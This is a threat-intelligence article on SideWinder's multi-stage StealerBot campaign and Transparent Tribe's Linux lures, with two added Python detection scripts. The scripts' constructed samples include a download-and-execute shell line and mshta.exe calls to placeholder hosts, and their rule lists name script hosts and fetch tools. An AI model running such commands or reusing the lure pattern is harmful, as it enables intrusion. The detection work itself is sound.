SideWinder APT Strikes Middle East and Africa With Stealthy Multi-Stage Attack
An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa.
The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04.
“The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations,” Kaspersky researchers Giampaolo Dedola and Vasily Berdnikov said.
Targets of the attacks include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities, and oil trading companies located in Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey, and the U.A.E.
SideWinder has also been observed setting its sights on diplomatic entities in Afghanistan, France, China, India, Indonesia, and Morocco.
The most significant aspect of the recent campaign is the use of a multi-stage infection chain to deliver a previously unknown post-exploitation toolkit called StealerBot.
It all commences with a spear-phishing email with an attachment – either a ZIP archive containing a Windows shortcut (LNK) file or a Microsoft Office document – that, in turn, executes a series of intermediate JavaScript and .NET downloaders to ultimately deploy the StealerBot malware.
The documents rely on the tried-and-tested technique of remote template injection to download an RTF file that is stored on an adversary-controlled remote server. The RTF file, for its part, triggers an exploit for CVE-2017-11882, to execute JavaScript code that’s responsible for running additional JavaScript code hosted on mofa-gov-sa.direct888[.]net.
On the other hand, the LNK file employs the mshta.exe utility, a Windows-native binary designed to execute Microsoft HTML Application (HTA) files, to run the same JavaScript code hosted on a malicious website controlled by the attacker.
The JavaScript malware serves to extract an embedded Base64-encoded string, a .NET library named “App.dll” that collects system information and functions as a downloader for a second .NET payload from a server (“ModuleInstaller.dll”).
ModuleInstaller is also a downloader, but one that’s equipped to maintain persistence on the host, execute a backdoor loader module, and retrieve next-stage components. But in an interesting twist, the manner in which they are run is determined by what endpoint security solution is installed on the host.
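The first hops of the chain described above (an Office document reaching the Equation Editor through CVE-2017-11882, a script host being spawned from it, or an LNK file driving mshta.exe at a remote URL) all leave a recognisable trace in process-creation telemetry. The following is an added example of that detection logic, not code from the article or from Kaspersky; the event records are constructed to resemble Sysmon Event ID 1 fields, and the rule names are my own.

```python
"""Process-creation rules for the early SideWinder chain:
Office -> remote template -> RTF -> Equation Editor (CVE-2017-11882) -> script host,
or LNK -> mshta.exe -> remote JavaScript.

Added example, not from the article or from Kaspersky. The events below are
constructed (not real telemetry) and the rule names are assumptions of this
example, not vendor signatures."""
from __future__ import annotations

import re
from typing import Iterable

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
EQUATION_EDITOR = "eqnedt32.exe"  # host process for the CVE-2017-11882 exploit
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the rule names matched by one process-creation event."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    hits: list[str] = []
    # The Equation Editor is commonly started through DCOM, so its own parent
    # is usually svchost.exe rather than the Office application. The useful
    # signal is therefore EQNEDT32 acting as a parent at all: it has no
    # legitimate reason to spawn children.
    if parent == EQUATION_EDITOR:
        hits.append("equation_editor_spawns_child")
    # Office applications launching script hosts directly.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # mshta.exe pointed at a remote HTA/JavaScript location (the LNK path).
    if child == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_url")
    return hits


def scan(events: Iterable[dict]) -> list[tuple[int, list[str]]]:
    """(ProcessId, matched rules) for every event that matched at least one rule."""
    return [(e["ProcessId"], hits) for e in events if (hits := classify(e))]


# Constructed sample events; paths and PIDs are illustrative only.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentImage": r"C:\Windows\explorer.exe", "Image": OFFICE,
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\invite.docx"'},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": EQNEDT,
     "CommandLine": r'"EQNEDT32.EXE" -Embedding'},
    {"ProcessId": 4212, "ParentImage": EQNEDT, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c cscript.exe C:\Users\u\AppData\Local\Temp\s.js"},
    {"ProcessId": 5001, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/stage1.hta"},
    {"ProcessId": 5100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"ProcessId": 5200, "ParentImage": OFFICE, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/stage1.hta"},
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS):
        print(pid, rules)
```

The second and fifth events are deliberately benign (an Equation Editor start with no children, and mshta.exe opening a local file) so the rules can be checked for false positives as well as hits; in production the same three rules map directly onto a SIEM query over the parent image, image and command line fields.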
“The Backdoor loader module has been observed since 2020,” the researchers said, pointing out its ability to evade detection and avoid running in sandboxed environments. “It has remained almost the same over the years.”
“It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, and the latest variants were designed to enumerate all the files in the current directory and load those without an extension.”
The end goal of the attacks is to drop StealerBot via the Backdoor loader module. Described as a .NET-based “advanced modular implant,” it is specifically geared to facilitate espionage activities by fetching several plugins to -
- Install additional malware using a C++ downloader
- Capture screenshots
- Log keystrokes
- Steal passwords from browsers
- Intercept RDP credentials
- Steal files
- Start reverse shell
- Phish Windows credentials, and
- Escalate privileges bypassing User Account Control (UAC)
“The implant consists of different modules loaded by the main ‘Orchestrator,’ which is responsible for communicating with the [command-and-control] and executing and managing the plugins,” the researchers said. “The Orchestrator is usually loaded by the backdoor loader module.”
Kaspersky said it detected two installer components – named InstallerPayload and InstallerPayload_NET – that don’t feature as part of the attack chain, but are used to install StealerBot to likely update to a new version or infect another user.
The expansion of SideWinder’s geographic reach and its use of a new sophisticated toolkit comes as cybersecurity company Cyfirma detailed new infrastructure running the Mythic post-exploitation framework and linked to Transparent Tribe (aka APT36), a threat actor believed to be of Pakistani origin.
“The group is distributing malicious Linux desktop entry files disguised as PDFs,” it said. “These files execute scripts to download and run malicious binaries from remote servers, establishing persistent access and evading detection.”
“APT36 is increasingly targeting Linux environments due to their widespread use in Indian government sectors, particularly with the Debian-based BOSS OS and the introduction of Maya OS.”
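A desktop entry file carries its own description of what it will run, so the "disguised as a PDF" lure Cyfirma describes can be checked for mechanically: a document-like Name paired with an Exec line that starts a shell or script interpreter and fetches something remote. The following is an added example of such a check, not Cyfirma's code and not a reconstruction of the actual Transparent Tribe files; the two sample entries are constructed, and the reason labels are this example's own.

```python
"""Flag Linux .desktop files whose Name looks like a document but whose Exec
line starts an interpreter and fetches remote content.

Added example, not from the article or from Cyfirma. The sample entries are
constructed; the host example.invalid is a placeholder."""
from __future__ import annotations

import configparser
import re
import shlex

DOC_SUFFIXES = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")
SCRIPT_INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
FETCH_RE = re.compile(r"\b(curl|wget)\b|https?://", re.IGNORECASE)


def parse_desktop_entry(text: str) -> dict[str, str]:
    """Parse the [Desktop Entry] group of a desktop entry file into a dict."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case: Exec, Name, Icon, ...
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("not a desktop entry file")
    return dict(cp["Desktop Entry"])


def suspicious_reasons(entry: dict[str, str]) -> list[str]:
    """Reasons this entry resembles a document-lure launcher (empty if none)."""
    name = entry.get("Name", "")
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:  # unbalanced quotes; fall back to whitespace split
        argv = exec_line.split()
    program = argv[0].rsplit("/", 1)[-1] if argv else ""

    reasons: list[str] = []
    if name.lower().endswith(DOC_SUFFIXES):
        reasons.append("name_looks_like_document")
    if program in SCRIPT_INTERPRETERS:
        reasons.append("exec_runs_script_interpreter")
    if FETCH_RE.search(exec_line):
        reasons.append("exec_fetches_remote_content")
    return reasons


def is_disguised_lure(entry: dict[str, str]) -> bool:
    """A document-looking name combined with any interpreter/fetch behaviour."""
    reasons = suspicious_reasons(entry)
    return "name_looks_like_document" in reasons and len(reasons) > 1


# Constructed samples: a lure-shaped entry and a legitimate viewer launcher.
LURE = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "curl -s http://example.invalid/s -o /tmp/.s; sh /tmp/.s"
"""

BENIGN = """[Desktop Entry]
Type=Application
Name=Document Viewer
Icon=org.gnome.Evince
Exec=evince %U
MimeType=application/pdf;
"""

if __name__ == "__main__":
    for label, text in (("lure", LURE), ("benign", BENIGN)):
        entry = parse_desktop_entry(text)
        print(label, is_disguised_lure(entry), suspicious_reasons(entry))
```

The check deliberately keys on the combination rather than on any single field: a real PDF viewer launcher legitimately names PDFs in its MimeType, and plenty of legitimate entries run shell wrappers, but a file that both presents itself as a document and downloads something to execute has no ordinary reason to exist in a user's Desktop or autostart directories.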